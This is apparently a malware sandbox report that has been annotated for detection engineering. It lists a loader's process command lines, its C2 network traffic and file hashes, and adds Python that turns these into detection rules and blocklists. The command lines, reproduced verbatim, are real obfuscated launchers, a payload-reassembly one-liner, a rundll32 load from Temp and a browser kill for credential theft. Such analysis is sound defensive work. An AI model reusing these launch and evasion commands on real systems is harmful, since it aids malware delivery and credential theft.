C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19896d3ece3b4.exe

Tue19896d3ece3b4.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19de85da9de6.exe

Tue19de85da9de6.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1140 -s 556

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19053251dd9e13fe.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19053251dd9e13fe.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe

Tue19b2a645b19f70.exe

C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp" /SL5="$601DA,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19896d3ece3b4.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19896d3ece3b4.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe") do taskkill -iM "%~nXx" /f

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19896d3ece3b4.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19896d3ece3b4.exe

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1252 -ip 1252

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1252 -s 12

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue196c8dc8316d5e.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3944 -ip 3944

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 608

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3904 -ip 3904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 868 -s 1772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 868 -ip 868
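The command lines in the Processes table above are the most reusable part of this report for detection engineering: Windows Defender is switched off and the drop directory excluded through Set-MpPreference / Add-MpPreference; mshta.exe runs an inline VBScript whose keywords have randomised case (VbscrIPt, tYPe, stART, CoPy) to defeat case-sensitive string matching; a cmd.exe one-liner copies the payload to a random name, relaunches it and taskkills the original; a second one-liner rebuilds a PE from chunk files by writing an "MZ" stub with set /P and concatenating with copy /B, then has msiexec -Y load the result as a DLL (the /y switch calls DllRegisterServer); rundll32 loads sqlite.dll from Temp; and chrome.exe is killed, which releases the locks on browser profile databases. The Python below is an added example written for this page, not part of the sandbox report: it runs a small set of case-insensitive rules over those command lines (copied from the table) plus one constructed benign control line, and maps each hit to an ATT&CK technique. The rule names, the technique mapping and the control line are the example's own choices.

```python
import re

# Command lines copied from the Processes table of this report. The last entry
# is a constructed benign control line and does not come from the report.
SAMPLE_CMDLINES = [
    'C:\\Windows\\system32\\cmd.exe /c powershell -inputformat none -outputformat none '
    '-NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true',
    'powershell -inputformat none -outputformat none -NonInteractive -Command '
    'Add-MpPreference -ExclusionPath "C:\\Users\\Admin\\AppData\\Local\\Temp"',
    '"C:\\Windows\\System32\\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( '
    '"C:\\Windows\\system32\\cmd.exe /q /C tYPe ""C:\\Users\\Admin\\AppData\\Local\\Temp\\7zSC36F0836\\Tue196c8dc8316d5e.exe"" '
    '> ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ '
    '&if """" == """" for %x In ( ""C:\\Users\\Admin\\AppData\\Local\\Temp\\7zSC36F0836\\Tue196c8dc8316d5e.exe"" ) '
    'do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )',
    '"C:\\Windows\\System32\\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A '
    '+ TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\\bENCc.E',
    'rundll32.exe "C:\\Users\\Admin\\AppData\\Local\\Temp\\sqlite.dll",global',
    'cmd.exe /c taskkill /f /im chrome.exe',
    'C:\\Windows\\system32\\cmd.exe /c dir "C:\\Users\\Admin\\Documents"',  # constructed control
]

# rule name -> (pattern, ATT&CK technique IDs). Every pattern is compiled with
# re.I because the launcher randomises keyword case (VbscrIPt, tYPe, stART, CoPy).
RULES = {
    "defender_realtime_off": (
        re.compile(r"set-mppreference\b.*-disablerealtimemonitoring\s+\$true", re.I),
        ("T1562.001",)),
    "defender_exclusion_added": (
        re.compile(r"add-mppreference\b.*-exclusionpath\b", re.I),
        ("T1562.001",)),
    # mshta.exe handed an inline vbscript:/javascript: URI instead of an .hta file
    "mshta_inline_script": (
        re.compile(r'mshta(?:\.exe)?"?\s+"?(?:vbscript|javascript):', re.I),
        ("T1218.005", "T1027")),
    # type <payload.exe> > <newname> && start <newname>: copy-rename-relaunch in cmd
    "type_copy_and_relaunch": (
        re.compile(r'\btype\s+"*[^>]*\.exe"*\s*>\s*\S+\s*&&\s*start\b', re.I),
        ("T1059.003",)),
    # set /P = "MZ" stub + copy /B chunks + msiexec -Y: rebuild a DLL, then register it
    "mz_stub_reassembly": (
        re.compile(r'set\s*/p\s*=\s*"?mz"?.*\bcopy\s+/b\b.*\bmsiexec\s+-y\b', re.I),
        ("T1140", "T1218.007")),
    # rundll32 loading a DLL that lives under the user's Temp directory
    "rundll32_temp_dll": (
        re.compile(r'rundll32(?:\.exe)?\s+"?[^"]*\\appdata\\local\\temp\\[^"]*\.dll"?\s*,', re.I),
        ("T1218.011",)),
    # browsers killed so their profile databases can be copied while unlocked
    "browser_kill": (
        re.compile(r"taskkill\b.*\s/im\s+(?:chrome|msedge|firefox|opera|brave)\.exe", re.I),
        ("T1555.003",)),
}


def scan(cmdline):
    """Names of every rule that fires on one command line, in RULES order."""
    return [name for name, (rx, _) in RULES.items() if rx.search(cmdline)]


def techniques(cmdline):
    """Sorted, de-duplicated ATT&CK technique IDs implied by the rules that fired."""
    return sorted({t for name in scan(cmdline) for t in RULES[name][1]})


def triage(cmdlines):
    """Map each rule name to the indices of the command lines that triggered it."""
    hits = {name: [] for name in RULES}
    for i, cmd in enumerate(cmdlines):
        for name in scan(cmd):
            hits[name].append(i)
    return hits


if __name__ == "__main__":
    for i, cmd in enumerate(SAMPLE_CMDLINES):
        print(i, scan(cmd), techniques(cmd))
```

The mshta line is deliberately matched by two rules: the outer one (an inline script URI) and the inner one (the cmd.exe copy-relaunch-kill it spawns), because in telemetry that inner command also appears on its own as the child cmd.exe (see the "/q /C tYPe ..." rows above), and a detection that only looks at mshta misses the re-execution from ~Xy1GPomKV09sC.Exe.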

Network

Country Destination Domain Proto
US 209.197.3.8:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 mooorni.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 t.gogamec.com udp
US 188.114.97.0:443 t.gogamec.com tcp
US 104.21.51.48:443 niemannbest.me tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 www.listincode.com udp
AU 103.224.212.220:443 www.listincode.com tcp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 propanla.com udp
RU 45.130.41.25:80 propanla.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 s.lletlee.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 ww25.listincode.com udp
US 199.59.243.220:80 ww25.listincode.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 gcl-gb.biz udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 telegatt.top udp
N/A 127.0.0.1:49830 tcp
N/A 127.0.0.1:49832 tcp
US 8.8.8.8:53 www.iyiqian.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 gcl-gb.biz udp
US 162.159.135.233:443 cdn.discordapp.com tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
NL 212.193.30.115:80 212.193.30.115 tcp
US 162.159.135.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 162.159.135.233:80 cdn.discordapp.com tcp
US 162.159.135.233:80 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 s.lletlee.com udp
NL 212.193.30.115:80 212.193.30.115 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 telegka.top udp
US 162.159.135.233:443 cdn.discordapp.com tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 telegka.top udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 directorycart.com udp
US 104.208.16.88:443 tcp
FI 135.181.129.119:4805 tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 telegka.top udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 tierzahnarzt.at udp
US 8.8.8.8:53 telegin.top udp
DE 91.195.240.101:80 tierzahnarzt.at tcp
US 8.8.8.8:53 streetofcards.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
N/A 127.0.0.127:80 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 ycdfzd.com udp
US 8.8.8.8:53 s.lletlee.com udp
N/A 127.0.0.127:80 tcp
US 8.8.8.8:53 successcoachceo.com udp
N/A 127.0.0.127:80 tcp
US 8.8.8.8:53 telegin.top udp
US 209.197.3.8:80 tcp
US 209.197.3.8:80 tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 uhvu.cn udp
US 8.8.8.8:53 japanarticle.com udp
US 8.8.8.8:53 s.lletlee.com udp
SG 72.5.161.12:80 japanarticle.com tcp
FI 135.181.129.119:4805 tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 telegin.top udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
FI 135.181.129.119:4805 tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
FI 135.181.129.119:4805 tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 s.lletlee.com udp
FI 135.181.129.119:4805 tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
FI 135.181.129.119:4805 tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
FI 135.181.129.119:4805 tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
FI 135.181.129.119:4805 tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
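The Network table above is flattened into whitespace-separated rows with an optional Domain column, which makes it awkward to lift indicators from by hand, and the rows are of very different value: hard-coded IP:port C2 on non-web ports (91.121.67.60:2151, 135.181.129.119:4805) and plain-IP HTTP (212.193.30.115:80) can be blocked outright, shared services such as cdn.discordapp.com, pastebin.com, iplogger.org and t.me cannot sensibly be blocked at the domain level, and the loopback destination 127.0.0.127:80 is not an external indicator at all. The Python below is an added example, not part of the report: it parses a subset of rows copied from the table and sorts them into those buckets. The SHARED_SERVICES set and the bucket definitions are the example's own judgement calls.

```python
import ipaddress
from collections import namedtuple

# Rows copied from the Network table of this report (a subset). The header row is
# included to show that the parser skips it.
SAMPLE_NETWORK = """\
Country Destination Domain Proto
US 209.197.3.8:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 mooorni.xyz udp
US 8.8.8.8:53 t.gogamec.com udp
US 188.114.97.0:443 t.gogamec.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
NL 212.193.30.115:80 212.193.30.115 tcp
N/A 127.0.0.127:80 tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
FI 135.181.129.119:4805 tcp
"""

# Shared services the sample talks to. Block these by URL or path, not by
# domain, or legitimate Discord/Pastebin/Telegram traffic breaks too.
SHARED_SERVICES = {"cdn.discordapp.com", "pastebin.com", "iplogger.org", "t.me"}

Conn = namedtuple("Conn", "country ip port domain proto")


def parse_network(text):
    """Parse 'Country Destination [Domain] Proto' rows; Domain is optional."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] == "Country":
            continue
        if len(parts) == 3:
            country, dest, proto = parts
            domain = None
        elif len(parts) == 4:
            country, dest, domain, proto = parts
        else:
            raise ValueError(f"unexpected row: {line!r}")
        ip, port = dest.rsplit(":", 1)
        conns.append(Conn(country, ip, int(port), domain, proto))
    return conns


def dns_queries(conns):
    """Domains the sample resolved (UDP/53 rows), sorted and de-duplicated."""
    return sorted({c.domain for c in conns
                   if c.proto == "udp" and c.port == 53 and c.domain})


def tcp_endpoints(conns):
    """Distinct external (non-loopback) TCP endpoints as (ip, port, domain)."""
    return {(c.ip, c.port, c.domain) for c in conns
            if c.proto == "tcp" and not ipaddress.ip_address(c.ip).is_loopback}


def nonstandard_ports(conns):
    """External TCP endpoints on ports other than 80/443: typical raw-socket C2."""
    return {(ip, port) for ip, port, _ in tcp_endpoints(conns) if port not in (80, 443)}


def hostnameless_endpoints(conns):
    """External TCP endpoints reached with no hostname (or the IP itself as the
    'hostname'): the address was hard-coded, so the IP:port is the indicator."""
    return {(ip, port) for ip, port, dom in tcp_endpoints(conns)
            if dom is None or dom == ip}


def shared_services_used(conns):
    """Shared hosting/paste/tracking services observed in the capture."""
    return {c.domain for c in conns if c.domain in SHARED_SERVICES}


def blocklist(conns):
    """(domains, ip_ports) that are safe to block outright: resolved domains that
    are not shared services, plus every hard-coded external endpoint."""
    domains = [d for d in dns_queries(conns) if d not in SHARED_SERVICES]
    return domains, sorted(hostnameless_endpoints(conns))


if __name__ == "__main__":
    conns = parse_network(SAMPLE_NETWORK)
    print("blocklist:", blocklist(conns))
    print("shared services (block by URL):", sorted(shared_services_used(conns)))
    print("non-web ports:", sorted(nonstandard_ports(conns)))
```

Rows with an empty Domain column are ambiguous in the original table: they can be a raw-socket connection to a hard-coded address, or a TLS session for which the sandbox did not record an SNI. Treating both as IP:port indicators is the conservative choice for blocking; for hunting, correlate the 2151 and 4805 endpoints with the process that opened them before attributing them to a specific family.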

Files

memory/1140-130-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe

MD5 469c30e8243cecd8e84d75e1de71cccc
SHA1 b128e2681c294d318cfbd2e45cdafc0407b4135b
SHA256 40e6b756ed4ed0bde5d204eb9842e7d8a48a2e3b528f27952c4c9238aa6685c8
SHA512 d02b2308a0ed03357239f9f886037475c79250ec52e279d606a756b693f9a0fd2f378bbade307ee09c2b21a9bba5e524c2b6400ba43c2bd4ab3b48fa39e64a30

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe

MD5 469c30e8243cecd8e84d75e1de71cccc
SHA1 b128e2681c294d318cfbd2e45cdafc0407b4135b
SHA256 40e6b756ed4ed0bde5d204eb9842e7d8a48a2e3b528f27952c4c9238aa6685c8
SHA512 d02b2308a0ed03357239f9f886037475c79250ec52e279d606a756b693f9a0fd2f378bbade307ee09c2b21a9bba5e524c2b6400ba43c2bd4ab3b48fa39e64a30

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/1140-143-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/1140-144-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1140-145-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/1140-147-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1140-148-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1140-146-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/1140-149-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1140-150-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1140-152-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1140-153-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1140-151-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1140-157-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3744-156-0x0000000000000000-mapping.dmp

memory/1140-155-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2092-154-0x0000000000000000-mapping.dmp

memory/736-159-0x0000000000000000-mapping.dmp

memory/3452-158-0x0000000000000000-mapping.dmp

memory/1996-160-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe

MD5 3e1cd5a1acf5ce17029d6aa9642ed115
SHA1 858af14318e1811a4d64646a6e062fd42a114ea8
SHA256 a988b93159c8e60e09f6458324885813af93e624429dcf99ac5b852e44ab99e5
SHA512 25204d025f730086dc5c2c64e935a750f232f8157559a0e0bcecdd721bc6398d393ba615dd227a41ddeac1cbac2586464c309acf760172e293f2355b4ecd1473

memory/2504-162-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
